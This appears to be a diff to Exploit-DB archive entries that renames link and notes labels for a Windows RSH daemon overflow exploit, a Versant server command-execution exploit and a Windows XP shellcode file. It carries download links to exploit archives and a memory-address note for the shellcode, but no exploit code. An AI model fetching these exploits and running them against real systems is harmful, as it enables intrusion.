@@ -1,5 +1,5 @@
 Windows RSH daemon <= 1.8 Remote Buffer Overflow Exploit
 
-http://www.exploit-db.com/sploits/2008-prdelka-vs-MS-rshd.tar.gz
+Exploit-DB mirror: http://www.exploit-db.com/sploits/2008-prdelka-vs-MS-rshd.tar.gz
 
 # milw0rm.com [2008-01-21]

platforms/windows/remote/5213.txt

@@ -1,5 +1,5 @@
 Versant server <= 7.0.1.3 Arbitrary Commands Execution Exploit
 
-http://www.exploit-db.com/sploits/2008-versantcmd.zip
+Exploit-DB mirror: http://www.exploit-db.com/sploits/2008-versantcmd.zip
 
 # milw0rm.com [2008-03-04]

platforms/windows/shellcode/14697.c

@@ -6,7 +6,7 @@ Tested on: Windows XP SP3 En
 Thanks: ishtus
 Greetz: Astalavista, OffSEC, Exploit-DB
 
-EDB Notes:
+Exploit-DB Notes:
 Tested under Windows XP SP3 Eng
 The correct memory address for GetProcAddress() appears to be different on our test machine,
 which is 0x7c80ae30.